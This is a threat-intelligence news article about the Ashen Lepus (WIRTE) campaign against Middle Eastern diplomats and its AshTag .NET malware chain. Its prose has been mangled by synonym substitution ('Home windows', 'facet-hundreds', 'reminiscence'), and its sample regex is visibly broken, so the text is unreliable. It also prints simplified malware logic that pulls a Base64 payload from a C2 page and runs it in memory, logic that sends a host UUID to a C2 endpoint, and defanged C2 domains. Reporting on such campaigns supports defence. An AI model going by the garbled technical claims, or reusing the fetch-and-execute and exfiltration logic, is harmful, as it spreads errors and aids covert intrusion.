A Hamas‑affiliated risk group generally known as Ashen Lepus, additionally tracked as WIRTE, has launched a brand new espionage marketing campaign towards governmental and diplomatic entities throughout the Center East.
The group makes use of real looking Arabic‑language diplomatic lures that reference regional politics and safety talks to trick officers into opening weaponized paperwork.
As soon as a goal interacts with the lure, a multi‑stage chain quietly delivers a brand new customized malware suite named AshTag, designed to steal delicate diplomatic paperwork and keep lengthy‑time period entry to compromised techniques.
Lure examples introduced to targets (Supply – Palo Alto Networks)
The operation has continued by latest regional conflicts and even after the October 2025 Gaza ceasefire, underlining the group’s give attention to persistent intelligence assortment somewhat than brief‑time period disruption.
The attackers depend on benign‑wanting PDFs that direct victims to obtain RAR archives containing a faux doc executable, a malicious loader, and an additional decoy PDF.
When the sufferer runs what seems to be a doc, Home windows facet‑hundreds a hidden malicious DLL and begins the an infection, whereas a innocent PDF opens on display screen to scale back suspicion.
AshTag’s preliminary an infection chain (Supply – Palo Alto Networks)
Palo Alto Networks safety researchers recognized this new AshTag toolkit whereas monitoring lengthy‑working Ashen Lepus exercise and observed clear modifications in each the malware and its command‑and‑management (C2) infrastructure.
As a substitute of utilizing devoted attacker‑owned domains, the group now hides behind API‑type subdomains of official‑wanting websites, akin to api.healthylifefeed[.]com and auth.onlinefieldtech[.]com, to make their site visitors mix in with regular internet exercise.
On the similar time, payloads are executed in reminiscence to depart fewer forensic traces on disk.
AshTag An infection Mechanism and Orchestrator Design
On the core of the marketing campaign is a modular .NET backdoor, AshTag, which masquerades as a VisualServer utility however really helps file exfiltration, command execution and in‑reminiscence loading of additional instruments.
The chain strikes from an preliminary loader dubbed AshenLoader, to a secondary stager referred to as AshenStager, and at last to an orchestration part, AshenOrchestrator, which controls all later modules.
The total AshTag Malware an infection chain (Supply – Palo Alto Networks)
AshenLoader sends fundamental host information to the C2 and fetches AshenStager from HTML content material hidden between customized headerp tags.
AshenStager then requests one other web page and extracts a Base64‑encoded payload buried inside article tags.
AshenOrchestrator’s Base64-encoded payload embedded inside the article HTML tags (Supply – Palo Alto Networks)
A simplified model of this parsing logic could be expressed as:-
var html = GetHtml(c2Url);
var match = Regex.Match(html, “]*>(?[^<]+)”);
var b64 = match.Teams[“data”].Worth;
var payload = Convert.FromBase64String(b64);
ExecuteInMemory(payload);
AshenOrchestrator receives a Base64‑encoded JSON configuration that features C2 domains, module URLs, encryption keys and jitter values mn and mx to randomize beacon timing.
It first derives an AES key from tg and au parameters, then decrypts an XOR key used to decode the subsequent embedded payload.
That payload is one other Base64‑encoded JSON object that defines the module’s class title, akin to SN for system fingerprinting or SCT for display screen seize, and the loading methodology mna, which may direct the orchestrator to save lots of a module to disk, execute it as a .NET meeting, add additional content material or inject code into reminiscence.
Decoded AshenOrchestrator configuration (Supply – Palo Alto Networks)
One recovered module, SN, performs host profiling by easy WMI queries and sends a novel sufferer ID again to the attackers, serving to Ashen Lepus give attention to excessive‑worth diplomatic techniques.
AshTag module decoding course of (Supply – Palo Alto Networks)
A fundamental model of this logic could be illustrated as:-
var id = GetWmi(“Win32_ComputerSystemProduct”, “UUID”);
PostToC2(“/api/v2/register”, id);
This cautious layering of loaders, HTML‑hidden payloads, and modular .NET elements exhibits that Ashen Lepus is steadily enhancing its tradecraft whereas conserving the code base easy, versatile and tuned for stealthy diplomatic espionage.
Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.
